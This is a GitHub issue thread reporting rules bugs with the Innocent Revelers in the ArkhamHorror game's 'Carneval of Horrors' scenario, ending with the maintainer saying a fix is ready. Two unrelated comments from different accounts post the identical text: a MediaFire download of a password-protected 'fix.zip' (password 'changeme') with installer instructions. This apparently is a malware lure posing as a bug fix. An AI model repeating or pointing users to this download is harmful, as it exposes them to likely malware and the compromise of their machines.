### ISSUE TITLE
Carneval of Horrors: Innocent Revelers not working as intended

### ISSUE THREAD

**Issue by Man-Myth-Legend** [halogenandtoast/ArkhamHorror#441]
**Provide a Game ID**
d89b8841-5eb3-4aab-aecb-dbf73211fe78

**Describe the bug**
I have encountered two situations where the Innocent Revelers aren't working as intended:

- Wendy Adams draws Watcher's Gaze while Leo controls an Innocent Reveler, but Leo does not get a willpower test or any horror.
- When drawing the tablet token which is supposed to deal 1 damage or horror to the nearest Innocent Reveler I don't get to deal the damage to the Innocent Reveler that Leo controls, but it goes to a reveler that is further away but not under any investigator's control.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rphmauriciodev** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by halogenandtoast** [comment]
Ironically neither issue was directly related to Innocent Revelers but I think I have a fix for both situations.
